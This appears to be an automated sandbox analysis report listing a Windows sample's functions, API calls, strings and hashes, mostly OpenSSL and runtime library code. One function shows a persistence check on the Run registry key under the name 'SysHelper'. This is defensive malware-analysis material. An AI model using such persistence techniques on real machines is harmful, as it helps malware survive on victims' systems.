                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                            • String ID: failed with error
                                                                                                                            • API String ID: 4182478520-946485432
                                                                                                                            • Opcode ID: e4f8c01c8f34220a4ad81851d7d90a0cdd97da867090419ad5fb31cf66cd4847
                                                                                                                            • Instruction ID: c3d05608617cfb244bf91d4584eea3445703bce539c14a0e9f44951c10bbaee4
                                                                                                                            • Opcode Fuzzy Hash: e4f8c01c8f34220a4ad81851d7d90a0cdd97da867090419ad5fb31cf66cd4847
                                                                                                                            • Instruction Fuzzy Hash: A6212B71640214B7D7206B618C4AFAE3E78EF56B10F104055FB05B2191CE741E46EBE9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004E22E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004B49A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,004B4B72), ref: 004B49C7
                                                                                                                              • Part of subcall function 004B49A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004B49D7
                                                                                                                              • Part of subcall function 004B49A0: GetDesktopWindow.USER32 ref: 004B49FB
                                                                                                                              • Part of subcall function 004B49A0: GetProcessWindowStation.USER32(?,004B4B72), ref: 004B4A01
                                                                                                                              • Part of subcall function 004B49A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,004B4B72), ref: 004B4A1C
                                                                                                                              • Part of subcall function 004B49A0: GetLastError.KERNEL32(?,004B4B72), ref: 004B4A2A
                                                                                                                              • Part of subcall function 004B49A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,004B4B72), ref: 004B4A65
                                                                                                                              • Part of subcall function 004B49A0: _wcsstr.LIBCMT ref: 004B4A8A
                                                                                                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004E2316
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 004E2323
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 004E2338
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004E2341
                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 004E234E
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004E235C
                                                                                                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 004E236E
                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004E23CA
                                                                                                                            • GetBitmapBits.GDI32(?,?,00000000), ref: 004E23D6
                                                                                                                            • SelectObject.GDI32(?,?), ref: 004E2436
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004E243D
                                                                                                                            • DeleteDC.GDI32(?), ref: 004E244A
                                                                                                                            • DeleteDC.GDI32(?), ref: 004E2450
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                            • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                                            • API String ID: 151064509-1805842116
                                                                                                                            • Opcode ID: 96c7fe7304d8cc941dee6d35ac060c67d4f2517c5dbbd9400cf98f79edfb5be0
                                                                                                                            • Instruction ID: a7f733731121fea7d785b09f5da35ba2d971b456535f3806dcbf7ece69462c6d
                                                                                                                            • Opcode Fuzzy Hash: 96c7fe7304d8cc941dee6d35ac060c67d4f2517c5dbbd9400cf98f79edfb5be0
                                                                                                                            • Instruction Fuzzy Hash: 1741E731904300ABD3209B759C4AF2FBFF8FF86714F00051EFA54962A2E7B598059BA6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004C35B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncmp
                                                                                                                            • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                            • API String ID: 909875538-2733969777
                                                                                                                            • Opcode ID: f7176b29183e0d612565700146fcec487909d0b3c8870d1a23a98061e27142c1
                                                                                                                            • Instruction ID: 15499d9d152e89039ca69ac54aa3ed96a96855e4c846955f700f7056c0425acc
                                                                                                                            • Opcode Fuzzy Hash: f7176b29183e0d612565700146fcec487909d0b3c8870d1a23a98061e27142c1
                                                                                                                            • Instruction Fuzzy Hash: 4AF149B56083006BD760EE65CC42F9B77D89F55709F04482EF98CD7283E678DA0987AB
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00485A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1503006713-0
                                                                                                                            • Opcode ID: 8707b3cd69aea085a4130ea83f189a77d50c8f1082ea57c9a4ecc17b9f7f1363
                                                                                                                            • Instruction ID: f8a7cf97401da2343448bf168c13f6a3994a7ec277660bfed55c334aa3f21e7b
                                                                                                                            • Opcode Fuzzy Hash: 8707b3cd69aea085a4130ea83f189a77d50c8f1082ea57c9a4ecc17b9f7f1363
                                                                                                                            • Instruction Fuzzy Hash: 00210831504A01ABEB267FA6DC42E0F7BE4DF81718F104C2FF44459192EE39A800DB5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00487B21 Relevance: 18.1, APIs: 12, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DecodePointer.KERNEL32 ref: 00487B29
                                                                                                                            • _free.LIBCMT ref: 00487B42
                                                                                                                              • Part of subcall function 00480BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0048507F,00000000,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480C01
                                                                                                                              • Part of subcall function 00480BED: GetLastError.KERNEL32(00000000,?,0048507F,00000000,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480C13
                                                                                                                            • _free.LIBCMT ref: 00487B55
                                                                                                                            • _free.LIBCMT ref: 00487B73
                                                                                                                            • _free.LIBCMT ref: 00487B85
                                                                                                                            • _free.LIBCMT ref: 00487B96
                                                                                                                            • _free.LIBCMT ref: 00487BA1
                                                                                                                            • _free.LIBCMT ref: 00487BC5
                                                                                                                            • EncodePointer.KERNEL32(00A3A7E0), ref: 00487BCC
                                                                                                                            • _free.LIBCMT ref: 00487BE1
                                                                                                                            • _free.LIBCMT ref: 00487BF7
                                                                                                                            • _free.LIBCMT ref: 00487C1F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3064303923-0
                                                                                                                            • Opcode ID: 5e65701c48902f68ef6406fbf7a20383cbe1bfaf1088c55980e928307351cbde
                                                                                                                            • Instruction ID: 2a3507ac28effe5e37248a6376e8cda2c2f13ca6dbe2f94e350d1be6b9853731
                                                                                                                            • Opcode Fuzzy Hash: 5e65701c48902f68ef6406fbf7a20383cbe1bfaf1088c55980e928307351cbde
                                                                                                                            • Instruction Fuzzy Hash: F9216675818590CBCB207F56BC44D1E77A5E71032C324182FE918673A1CAB8B88CBB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00471B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00471BB0
                                                                                                                            • CoCreateInstance.OLE32(0052E908,00000000,00000001,0052D568,00000000), ref: 00471BC8
                                                                                                                            • CoUninitialize.OLE32 ref: 00471BD0
                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00471C12
                                                                                                                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00471C22
                                                                                                                            • lstrcatW.KERNEL32(?,00560050), ref: 00471C3A
                                                                                                                            • lstrcatW.KERNEL32(?), ref: 00471C44
                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00471C68
                                                                                                                            • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00471C7A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                                            • String ID: \shell32.dll
                                                                                                                            • API String ID: 679253221-3783449302
                                                                                                                            • Opcode ID: 65f5b3423bcd66fa1a364eab39d0b0744349c40df0eb7c6fd9fecb85c134adf3
                                                                                                                            • Instruction ID: 7a5933bc3a298e598d6025b3b9a56fce2a251b265cdcf9e1af5fddfdf7b53373
                                                                                                                            • Opcode Fuzzy Hash: 65f5b3423bcd66fa1a364eab39d0b0744349c40df0eb7c6fd9fecb85c134adf3
                                                                                                                            • Instruction Fuzzy Hash: E0414C70A40219AFDB20CBA4CC88FEE7BBCEF59704F004499F509EB190D6B1AE45CB60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004B49A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,004B4B72), ref: 004B49C7
                                                                                                                            • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004B49D7
                                                                                                                            • GetDesktopWindow.USER32 ref: 004B49FB
                                                                                                                            • GetProcessWindowStation.USER32(?,004B4B72), ref: 004B4A01
                                                                                                                            • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,004B4B72), ref: 004B4A1C
                                                                                                                            • GetLastError.KERNEL32(?,004B4B72), ref: 004B4A2A
                                                                                                                            • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,004B4B72), ref: 004B4A65
                                                                                                                            • _wcsstr.LIBCMT ref: 004B4A8A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                            • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                            • API String ID: 2112994598-1672312481
                                                                                                                            • Opcode ID: e5bd30677be0ac3006d68687f56fc1cdc07d577a24bb8c69c7ce70cf849f50ac
                                                                                                                            • Instruction ID: eb447ca3da45c3805525e92da6640c3a47436316e7481d1e59ba4b6d3c247b8b
                                                                                                                            • Opcode Fuzzy Hash: e5bd30677be0ac3006d68687f56fc1cdc07d577a24bb8c69c7ce70cf849f50ac
                                                                                                                            • Instruction Fuzzy Hash: 57313931A401089BDB20DBB9EC466EE77B8EF98320F10061BE815D32D2EB3499159B64
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004B4AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(000000F4,004B4C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,004B480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,004B1D37,00000000,0046CDAE,00000001,00000001), ref: 004B4AFA
                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 004B4B05
                                                                                                                            • __vfwprintf_p.LIBCMT ref: 004B4B27
                                                                                                                              • Part of subcall function 0048BDCC: _vfprintf_helper.LIBCMT ref: 0048BDDF
                                                                                                                            • vswprintf.LIBCMT ref: 004B4B5D
                                                                                                                            • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 004B4B7E
                                                                                                                            • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 004B4BA2
                                                                                                                            • DeregisterEventSource.ADVAPI32(00000000), ref: 004B4BA9
                                                                                                                            • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 004B4BD3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                                            • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                            • API String ID: 277090408-1348657634
                                                                                                                            • Opcode ID: e5c5ddd0d45438c8ed059426f41da6f9f2f66c08b25d21021d5b48592783c861
                                                                                                                            • Instruction ID: 4e2bdff3829aa489a41b2a48ab9ab2279d0de42725087c09bcef62b72ae397aa
                                                                                                                            • Opcode Fuzzy Hash: e5c5ddd0d45438c8ed059426f41da6f9f2f66c08b25d21021d5b48592783c861
                                                                                                                            • Instruction Fuzzy Hash: E1219571648304ABE770A760CC4BFEF7B98AF98700F44481EF699861D1EBF894449767
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00472360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00472389
                                                                                                                            • _memset.LIBCMT ref: 004723B6
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004723DE
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004723E7
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 004723F4
                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004723FF
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047240E
                                                                                                                            • lstrcmpW.KERNEL32(?,?), ref: 00472422
                                                                                                                            Strings
                                                                                                                            • SysHelper, xrefs: 004723D6
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0047237F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                            • API String ID: 122392481-4165002228
                                                                                                                            • Opcode ID: 4ad24fdd756bc283cb265548d0c77c149bad0681771f2b4e0ebc53ac6f9ceb4e
                                                                                                                            • Instruction ID: d683367246fdd22902d612250551eaca766244ee2758b057a6f1bdc7638c200e
                                                                                                                            • Opcode Fuzzy Hash: 4ad24fdd756bc283cb265548d0c77c149bad0681771f2b4e0ebc53ac6f9ceb4e
                                                                                                                            • Instruction Fuzzy Hash: 3D115C7190020CABDF20DBA0DC49FEE7BBCBF05705F0045A5B509E2151DBB45A89AB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004AF26C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 58COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::exception::exception.LIBCMT ref: 004AF27F
                                                                                                                              • Part of subcall function 00490CFC: std::exception::_Copy_str.LIBCMT ref: 00490D15
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF294
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,004AF299,?,?,?,?,?,?,?,004AF299,?,00568238,?), ref: 00490F1F
                                                                                                                            • std::exception::exception.LIBCMT ref: 004AF2AD
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF2C2
                                                                                                                            • std::regex_error::regex_error.LIBCPMT ref: 004AF2D4
                                                                                                                              • Part of subcall function 004AEF74: std::exception::exception.LIBCMT ref: 004AEF8E
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF2E2
                                                                                                                            • std::exception::exception.LIBCMT ref: 004AF2FB
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF310
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                            • String ID: bad function call$leS
                                                                                                                            • API String ID: 2464034642-3897984503
                                                                                                                            • Opcode ID: 85f2922f9c52bf5a9630460e357befe5319430edcd707a02154ab4582586e7f6
                                                                                                                            • Instruction ID: 5649ec8c1bbda7027ea540c0276f15566c6820ca005db5634286144776f8aebc
                                                                                                                            • Opcode Fuzzy Hash: 85f2922f9c52bf5a9630460e357befe5319430edcd707a02154ab4582586e7f6
